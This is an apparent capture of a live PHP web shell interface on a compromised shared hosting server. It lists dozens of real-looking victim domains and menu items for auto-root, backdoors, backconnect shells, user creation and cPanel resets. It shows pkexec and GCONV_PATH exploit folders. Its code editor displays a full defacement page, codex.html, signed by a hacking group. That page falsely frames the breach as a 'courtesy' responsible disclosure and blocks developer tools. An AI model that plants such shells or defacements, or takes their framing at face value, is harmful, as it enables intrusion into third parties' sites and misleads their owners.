Linux in-mum-web1949.main-hosting.eu 5.14.0-503.40.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Mon May 5 06:06:04 EDT 2025 x86_64
LiteSpeed
: 2a02:4780:11:2049:0:237f:5677:4 | : 216.73.217.65
Cant Read [ /etc/named.conf ]
7.4.33
u595547767
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
u595547767 /
domains /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
analeenaalogistics.com
[ DIR ]
drwxr-xr-x
apteluniforms.com
[ DIR ]
drwxr-xr-x
ardhram.com
[ DIR ]
drwxr-xr-x
beatzhealthcare.co.uk
[ DIR ]
drwxr-xr-x
behomes.co.in
[ DIR ]
drwxr-xr-x
bharathmillsonline.com
[ DIR ]
drwxr-xr-x
bhomes.co.in
[ DIR ]
drwxr-xr-x
bisonvalleyhomestay.com
[ DIR ]
drwxr-xr-x
brightviewlandscapes.ca
[ DIR ]
drwxr-xr-x
ecoarkremovals.com
[ DIR ]
drwxr-xr-x
fireratedseals.com
[ DIR ]
drwxr-xr-x
foodieangel.com
[ DIR ]
drwxr-xr-x
holylandtravels.in
[ DIR ]
drwxr-xr-x
hridayaseniorcare.com
[ DIR ]
drwxr-xr-x
hwmcleankerala.com
[ DIR ]
drwxr-xr-x
ieltswitharunanand.com
[ DIR ]
drwxr-xr-x
ignainteriors.com
[ DIR ]
drwxr-xr-x
irisworldschool.com
[ DIR ]
drwxr-xr-x
jaineestreatments.com
[ DIR ]
drwxr-xr-x
jkjewelskolenchery.com
[ DIR ]
drwxr-xr-x
juliesmakessmile.com
[ DIR ]
drwxr-xr-x
junglebookholidays.in
[ DIR ]
drwxr-xr-x
lemaplegermanacademy.com
[ DIR ]
drwxr-xr-x
lemaplelanguagx.com
[ DIR ]
drwxr-xr-x
linkgopatche-com-913183.hostin...
[ DIR ]
drwxr-xr-x
linkgopatche.com
[ DIR ]
drwxr-xr-x
maharajapatiala.com
[ DIR ]
drwxr-xr-x
malikaagrogardens.com
[ DIR ]
drwxr-xr-x
masterbirdcoaching.com
[ DIR ]
drwxr-xr-x
metrocoats.com
[ DIR ]
drwxr-xr-x
molycare.in
[ DIR ]
drwxr-xr-x
nilasevasamithi.com
[ DIR ]
drwxr-xr-x
orchidmattress.com
[ DIR ]
drwxr-xr-x
palkulamhills.com
[ DIR ]
drwxr-xr-x
pookkada.in
[ DIR ]
drwxr-xr-x
rakkuzhiyilnursery.com
[ DIR ]
drwxr-xr-x
resolvemv-com-267309.hostinger...
[ DIR ]
drwxr-xr-x
resolvemv.com
[ DIR ]
drwxr-xr-x
rightwayjobconsultancy.com
[ DIR ]
drwxr-xr-x
risemultistate.com
[ DIR ]
drwxr-xr-x
rosamysticacc.com
[ DIR ]
drwxr-xr-x
sarasonbiomed.com
[ DIR ]
drwxr-xr-x
sly-beauty.com
[ DIR ]
drwxr-xr-x
smdtrust.org
[ DIR ]
drwxr-xr-x
spherehealthcare.ca
[ DIR ]
drwxr-xr-x
stmarysjsocgoldcoast.com
[ DIR ]
drwxr-xr-x
taborhomeskochi.com
[ DIR ]
drwxr-xr-x
universalbioscience.com
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
adminer.php
465.43
KB
-rw-r--r--
codex.html
27.37
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : codex.html
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"> <title>TOUCHED BY C0DEX SQU4D</title> <!-- Only Iceland Font --> <link href="https://fonts.googleapis.com/css2?family=Iceland&display=swap" rel="stylesheet"> <style> /* ----- RESET & BASE – pure black ----- */ * { margin: 0; padding: 0; box-sizing: border-box; } body { background: #000000; font-family: 'Iceland', cursive; font-weight: 400; overflow: hidden; height: 100vh; width: 100vw; display: flex; justify-content: center; align-items: center; cursor: default; user-select: none; -webkit-user-select: none; padding: 0; position: relative; } html, body { max-width: 100%; overflow-x: hidden; background: #000000; } /* canvas background layer */ #red-canvas { position: fixed; top: 0; left: 0; width: 100%; height: 100%; z-index: 0; pointer-events: none; display: block; background: transparent; } /* ghost logo watermark */ .ghost-logo-background { position: fixed; top: 0; left: 0; width: 100%; height: 100%; display: flex; align-items: center; justify-content: center; z-index: 5; pointer-events: none; } .ghost-logo-background img { width: min(70vw, 70vh); max-width: 400px; height: auto; aspect-ratio: 1/1; object-fit: contain; opacity: 0.45; filter: brightness(1.2) contrast(1.1); border-radius: 50%; box-shadow: 0 0 60px rgba(255, 0, 0, 0.3); } /* ===== PAGE 1: SECURITY NOTICE ===== */ .page-notice { position: fixed; top: 0; left: 0; width: 100%; height: 100%; z-index: 1000; display: flex; justify-content: center; align-items: center; background: transparent; pointer-events: all; transition: opacity 0.5s ease; } .page-notice.hidden { opacity: 0; pointer-events: none; } /* transparent gray card - NO BORDER */ .notice-card { background: rgba(40, 40, 50, 0.55); backdrop-filter: blur(12px); -webkit-backdrop-filter: blur(12px); border: none; border-radius: 48px; padding: 3rem 4rem; box-shadow: 0 20px 40px rgba(0, 0, 0, 0.7), 0 0 40px rgba(255, 0, 0, 0.2); max-width: 750px; width: 90%; display: flex; flex-direction: column; align-items: center; justify-content: center; } /* NO VERTICAL SPACE between any children */ .notice-card > * { margin: 0; padding: 0; } /* SECURITY NOTICE - RED H6 */ .notice-title { font-family: 'Iceland', cursive; font-weight: 400; font-size: 1.2rem; color: #ff0000; text-transform: uppercase; text-shadow: 0 0 15px #ff0000, 0 0 30px #ff0000; letter-spacing: 4px; line-height: 1; text-align: center; margin: 0; padding: 0; } /* C0D3X SQU4D WAS HERE! */ .notice-sub { font-family: 'Iceland', cursive; font-weight: 400; font-size: 1rem; color: #ffffff; text-transform: uppercase; text-shadow: none; letter-spacing: 3px; line-height: 1; text-align: center; opacity: 0.95; margin: 0; padding: 0; } /* CONTINUE button */ .continue-btn { background: transparent; border: none; font-family: 'Iceland', cursive; font-size: 1.2rem; text-transform: uppercase; padding: 0; cursor: pointer; transition: all 0.3s ease; letter-spacing: 5px; line-height: 1; display: inline-flex; align-items: center; justify-content: center; gap: 2px; margin: 0; padding: 0; } /* White symbols */ .continue-symbol { color: #ffffff; text-shadow: 0 0 8px #ff0000; font-weight: 400; } /* Red CONTINUE text */ .continue-text { color: #ff0000; text-shadow: 0 0 12px #ff0000, 0 0 24px #ff0000; font-weight: 400; margin: 0 2px; } .continue-btn:hover .continue-text { color: #ffffff; text-shadow: 0 0 20px #ff0000; } .continue-btn:hover .continue-symbol { color: #ff0000; text-shadow: 0 0 20px #ff0000; } /* ===== PAGE 2: MAIN ANIMATED CONTENT ===== */ .page-main { position: fixed; top: 0; left: 0; width: 100%; height: 100%; z-index: 10; display: flex; flex-direction: column; justify-content: center; align-items: center; opacity: 0; pointer-events: none; transition: opacity 0.8s ease; } .page-main.visible { opacity: 1; pointer-events: all; } .page-main.animate-glitch { animation: noise-3-27 2.7s linear infinite; } @keyframes noise-3-27 { 0%, 1.2%, 2%, 16.8%, 17.6%, 100% { opacity: 1; transform: scaleY(1) scaleX(1) rotate(0deg); } 1.72% { transform: scaleY(4) scaleX(1) rotate(0deg); opacity: 0.95; } 17.2% { transform: scaleY(1) scaleX(10) rotate(60deg); opacity: 0.9; } } body.glitch-flash { filter: blur(1px) brightness(1.6) contrast(1.4); transform: skew(3deg) scale(1.02); transition: all 0.08s ease; } .main-container { display: flex; flex-direction: column; align-items: center; justify-content: center; width: 100%; max-width: 900px; margin: 0 auto; padding: 0; position: relative; min-height: 100vh; } .top-row { display: flex; align-items: center; justify-content: center; width: 100%; padding: 0; flex-shrink: 0; margin: 0; gap: 20px; } .logo-left, .logo-right { display: flex; align-items: center; flex: 0 0 auto; padding: 0; margin: 0; } .logo-left { justify-content: flex-end; } .logo-right { justify-content: flex-start; } .silver-logo { width: 50px; height: 50px; display: block; object-fit: contain; filter: none; opacity: 1; background: transparent; border: none; } .center-text { display: flex; flex-direction: column; align-items: center; justify-content: center; flex: 0 0 auto; padding: 0; margin: 0; line-height: 1; } .codex-squad { font-family: 'Iceland', cursive; font-weight: 400; font-size: 2.2rem; color: #ffffff; text-transform: uppercase; line-height: 1; text-shadow: 2px 2px 10px #ff0000; letter-spacing: 3px; white-space: nowrap; margin: 0; padding: 0; } .penetrators-sub { font-family: 'Iceland', cursive; font-weight: 400; font-size: 1rem; color: #ffffff; text-transform: uppercase; letter-spacing: 4px; margin: 0; padding: 0; text-shadow: 2px 2px 6px #ff0000; white-space: nowrap; line-height: 1; } .breach-section { display: flex; flex-direction: column; align-items: center; justify-content: center; width: 100%; text-align: center; margin: 0; padding: 0; line-height: 1; } .breach-title { font-family: 'Iceland', cursive; font-weight: 400; font-size: 1.8rem; color: #ff0000; text-transform: uppercase; margin: 0; padding: 0; letter-spacing: 2px; text-shadow: 0 0 10px rgba(255, 0, 0, 0.6); line-height: 1; } .breach-message { font-family: 'Iceland', cursive; font-weight: 400; font-size: 0.95rem; color: #ffffff; margin: 0 auto; padding: 0 20px; line-height: 1; text-shadow: 2px 2px 5px rgba(0, 0, 0, 0.8); width: 100%; max-width: 700px; text-align: center; white-space: normal; word-wrap: break-word; overflow-wrap: break-word; } .contact-us-link { font-family: 'Iceland', cursive; font-weight: 400; font-size: 1rem; color: #ffffff; text-transform: uppercase; text-decoration: none; letter-spacing: 4px; padding: 0; margin: 10px 0 5px 0; display: inline-block; border-bottom: none; transition: all 0.2s ease; cursor: pointer; text-shadow: 2px 2px 6px #ff0000; line-height: 1; } .contact-us-link:hover { color: #ff0000; text-shadow: 0 0 15px #ff0000; transform: scale(1.05); } /* Copyright below CONTACT US - SAME SIZE AS MESSAGE TEXT, NO GLOWING COLOR */ .copyright-below { font-family: 'Iceland', cursive; font-weight: 400; font-size: 0.95rem; color: #ffffff; text-transform: none; letter-spacing: 1px; margin: 0; padding: 0; line-height: 1; text-shadow: none; } /* Landscape mode adjustments */ @media (orientation: landscape) { .main-container { max-width: 95%; padding: 0; } .breach-message { max-width: 80%; font-size: 0.85rem; } .breach-title { font-size: 1.4rem; } .codex-squad { font-size: 1.6rem; } .penetrators-sub { font-size: 0.8rem; } .silver-logo { width: 35px; height: 35px; } .top-row { gap: 10px; } .copyright-below { font-size: 0.85rem; } .ghost-logo-background img { width: min(50vw, 50vh); max-width: 300px; opacity: 0.5; } } /* responsive */ @media (max-width: 700px) { .notice-card { padding: 2.5rem 2rem; } .breach-message { max-width: 90%; } .silver-logo { width: 40px; height: 40px; } .copyright-below { font-size: 0.85rem; } .ghost-logo-background img { width: min(60vw, 60vh); max-width: 350px; opacity: 0.5; } } @media (max-width: 480px) { .notice-card { padding: 2rem 1.5rem; } .continue-btn { font-size: 1rem; } .breach-message { max-width: 95%; font-size: 0.85rem; } .codex-squad { font-size: 1.4rem; white-space: normal; } .penetrators-sub { font-size: 0.7rem; white-space: normal; } .silver-logo { width: 30px; height: 30px; } .top-row { gap: 8px; flex-wrap: wrap; } .copyright-below { font-size: 0.85rem; } .ghost-logo-background img { width: min(55vw, 55vh); max-width: 280px; opacity: 0.55; } } </style> </head> <body> <canvas id="red-canvas"></canvas> <div class="ghost-logo-background"> <img src="https://i.ibb.co/9jZcFqP/1773060358521.png" alt="CSP Ghost Logo"> </div> <!-- PAGE 1: SECURITY NOTICE - NO VERTICAL SPACE --> <div class="page-notice" id="pageNotice"> <div class="notice-card"> <div class="notice-title">🔕 SECURITY NOTICE 🔕</div> <div class="notice-sub">C0D3X SQU4D PENETRATORS WAS HERE</div> <button class="continue-btn" id="continueBtn"> <span class="continue-symbol">-==[</span> <span class="continue-text">CONTINUE</span> <span class="continue-symbol">]==-</span> </button> </div> </div> <!-- PAGE 2: MAIN CONTENT - NO VERTICAL SPACE --> <div class="page-main" id="pageMain"> <div class="main-container"> <div class="top-row"> <div class="logo-left"> <img src="https://i.ibb.co/9jZcFqP/1773060358521.png" alt="CSP Logo" class="silver-logo" id="cspLogoLeft" onerror="this.onerror=null; this.src='data:image/svg+xml,%3Csvg xmlns=\'http://www.w3.org/2000/svg\' viewBox=\'0 0 100 100\'%3E%3Crect width=\'100\' height=\'100\' fill=\'%2390a8c0\' rx=\'0\'/%3E%3Ctext x=\'50\' y=\'70\' font-size=\'48\' font-family=\'Iceland\' font-weight=\'400\' fill=\'%23ffffff\' text-anchor=\'middle\'%3ECSP%3C/text%3E%3C/svg%3E';"> </div> <div class="center-text"> <div class="codex-squad">C0D3X SQU4D</div> <div class="penetrators-sub">PENETRATORS</div> </div> <div class="logo-right"> <img src="https://i.ibb.co/9jZcFqP/1773060358521.png" alt="CSP Logo" class="silver-logo" id="cspLogoRight" onerror="this.onerror=null; this.src='data:image/svg+xml,%3Csvg xmlns=\'http://www.w3.org/2000/svg\' viewBox=\'0 0 100 100\'%3E%3Crect width=\'100\' height=\'100\' fill=\'%2390a8c0\' rx=\'0\'/%3E%3Ctext x=\'50\' y=\'70\' font-size=\'48\' font-family=\'Iceland\' font-weight=\'400\' fill=\'%23ffffff\' text-anchor=\'middle\'%3ECSP%3C/text%3E%3C/svg%3E';"> </div> </div> <div class="breach-section"> <h4 class="breach-title">SECURITY NOTICE</h4> <div class="breach-message" id="typingMessage"></div> <a href="#" class="contact-us-link" id="contactUsBtn">-==[ CONTACT US ]==-</a> <div class="copyright-below">All Rights Reserved Codex Squad Penetrators ~ 2024</div> </div> </div> </div> <script> (function() { 'use strict'; let hasStarted = false; let glitchInterval = null; let isContactUsTriggered = false; const pageNotice = document.getElementById('pageNotice'); const pageMain = document.getElementById('pageMain'); const continueBtn = document.getElementById('continueBtn'); const contactUsBtn = document.getElementById('contactUsBtn'); // Canvas animation const canvas = document.getElementById('red-canvas'); const ctx = canvas.getContext('2d'); let width, height; let particles = []; let animationFrame; function initParticles() { const particleCount = 75; particles = []; for (let i = 0; i < particleCount; i++) { particles.push({ x: Math.random() * width, y: Math.random() * height, radius: Math.random() * 3.5 + 1.2, speedX: (Math.random() - 0.5) * 0.3, speedY: (Math.random() - 0.5) * 0.3, color: `rgba(255, ${40 + Math.floor(50 * Math.random())}, ${40 + Math.floor(40 * Math.random())}, `, opacity: Math.random() * 0.5 + 0.3, }); } } function resizeCanvas() { width = window.innerWidth; height = window.innerHeight; canvas.width = width; canvas.height = height; initParticles(); } function drawParticles() { ctx.clearRect(0, 0, width, height); ctx.lineWidth = 1.2; for (let i = 0; i < particles.length; i++) { for (let j = i + 1; j < particles.length; j++) { const dx = particles[i].x - particles[j].x; const dy = particles[i].y - particles[j].y; const dist = Math.sqrt(dx * dx + dy * dy); if (dist < 220) { ctx.beginPath(); ctx.moveTo(particles[i].x, particles[i].y); ctx.lineTo(particles[j].x, particles[j].y); const opacity = 0.3 * (1 - dist/240); ctx.strokeStyle = `rgba(255, 40, 40, ${opacity})`; ctx.stroke(); } } } for (let p of particles) { ctx.beginPath(); ctx.arc(p.x, p.y, p.radius, 0, Math.PI * 2); ctx.fillStyle = p.color + p.opacity + ')'; ctx.fill(); ctx.shadowColor = '#ff0000'; ctx.shadowBlur = 8; ctx.fill(); ctx.shadowBlur = 0; ctx.beginPath(); ctx.arc(p.x, p.y, p.radius * 0.4, 0, Math.PI * 2); ctx.fillStyle = 'rgba(255, 180, 180, 0.9)'; ctx.fill(); } for (let p of particles) { p.x += p.speedX; p.y += p.speedY; if (p.x < 0) p.x = width; if (p.x > width) p.x = 0; if (p.y < 0) p.y = height; if (p.y > height) p.y = 0; } animationFrame = requestAnimationFrame(drawParticles); } window.addEventListener('resize', resizeCanvas); resizeCanvas(); drawParticles(); // Typewriter message const messageElement = document.getElementById('typingMessage'); const fullMessage = "Your system has been accessed by codex squad penetrators. All databases, user credentials, and internal configurations have been reviewed. This is a responsible disclosure: your security protocols require immediate attention. No data has been misused; this is a courtesy notification to strengthen your defenses against potential threats. " + "We strongly advise you to update all security patches within 48 hours. Your firewall settings showed multiple vulnerabilities that need immediate patching. Remember to enable two-factor authentication on all administrative accounts for better protection."; messageElement.textContent = ''; let index = 0; const typingSpeed = 35; // Audio setup - ALL USING SAME RAW.GITHUBUSERCONTENT.COM PATTERN const glitchSoundUrl = 'https://raw.githubusercontent.com/mikzkaile101-png/CODEX-SQUAD-PENETRATORS/main/glitch.mp3'; const musicSoundUrl = 'https://raw.githubusercontent.com/mikzkaile101-png/CODEX-SQUAD-PENETRATORS/main/codexsquads.MP3'; const contactUsSoundUrl = 'https://raw.githubusercontent.com/mikzkaile101-png/CODEX-SQUAD-PENETRATORS/main/contact_us.mp3'; let audioContext = null; try { audioContext = new (window.AudioContext || window.webkitAudioContext)(); audioContext.suspend(); } catch (e) {} const GLITCH_POOL_SIZE = 4; const glitchSounds = []; for (let i = 0; i < GLITCH_POOL_SIZE; i++) { const audio = new Audio(glitchSoundUrl); audio.volume = 0.45; audio.preload = 'auto'; audio.load(); glitchSounds.push(audio); } let glitchSoundIndex = 0; const backgroundMusic = new Audio(musicSoundUrl); backgroundMusic.volume = 0.5; backgroundMusic.loop = true; backgroundMusic.preload = 'auto'; backgroundMusic.load(); const contactUsSound = new Audio(contactUsSoundUrl); contactUsSound.volume = 0.7; contactUsSound.preload = 'auto'; contactUsSound.load(); function stopAllSounds() { // Stop background music backgroundMusic.pause(); backgroundMusic.currentTime = 0; // Stop all glitch sounds for (let i = 0; i < glitchSounds.length; i++) { glitchSounds[i].pause(); glitchSounds[i].currentTime = 0; } // Clear glitch interval if (glitchInterval) { clearInterval(glitchInterval); glitchInterval = null; } } function playContactUsSound() { stopAllSounds(); contactUsSound.currentTime = 0; contactUsSound.play().catch(e => console.log('Audio play error:', e)); } function playGlitchSound() { if (!hasStarted || isContactUsTriggered) return; const audio = glitchSounds[glitchSoundIndex]; try { audio.volume = 0.45; audio.currentTime = 0; const playPromise = audio.play(); if (playPromise !== undefined) playPromise.catch(() => {}); } catch (e) {} glitchSoundIndex = (glitchSoundIndex + 1) % GLITCH_POOL_SIZE; } function triggerGlitchFlash() { if (!hasStarted || isContactUsTriggered) return; document.body.classList.add('glitch-flash'); setTimeout(() => { document.body.classList.remove('glitch-flash'); }, 120); } function triggerGlitch() { if (!hasStarted || isContactUsTriggered) return; playGlitchSound(); triggerGlitchFlash(); } function typeNextCharacter() { if (!hasStarted) return; if (index >= fullMessage.length) return; messageElement.textContent += fullMessage.charAt(index); index++; if (index < fullMessage.length) { setTimeout(typeNextCharacter, typingSpeed); } } function startEverything() { if (hasStarted) return; hasStarted = true; pageNotice.classList.add('hidden'); pageMain.classList.add('visible'); if (audioContext && audioContext.state === 'suspended') { audioContext.resume().catch(() => {}); } backgroundMusic.play().catch(() => {}); pageMain.classList.add('animate-glitch'); messageElement.textContent = ''; index = 0; typeNextCharacter(); glitchInterval = setInterval(triggerGlitch, 2700); setTimeout(triggerGlitch, 500); } function handleContactUs() { if (isContactUsTriggered) return; isContactUsTriggered = true; playContactUsSound(); // Remove glitch animation from page pageMain.classList.remove('animate-glitch'); } continueBtn.addEventListener('click', (e) => { e.stopPropagation(); startEverything(); }); contactUsBtn.addEventListener('click', (e) => { e.preventDefault(); e.stopPropagation(); if (hasStarted) { handleContactUs(); } }); // Anti-devtools document.addEventListener('contextmenu', (e) => e.preventDefault()); document.addEventListener('keydown', (e) => { if ( e.keyCode === 123 || (e.ctrlKey && e.shiftKey && (e.keyCode === 73 || e.keyCode === 74)) || (e.ctrlKey && e.keyCode === 85) ) { e.preventDefault(); return false; } }); function fixViewportHeight() { const vh = window.innerHeight * 0.01; document.documentElement.style.setProperty('--vh', vh + 'px'); } fixViewportHeight(); window.addEventListener('resize', fixViewportHeight); window.addEventListener('orientationchange', fixViewportHeight); })(); </script> </body> </html>
Close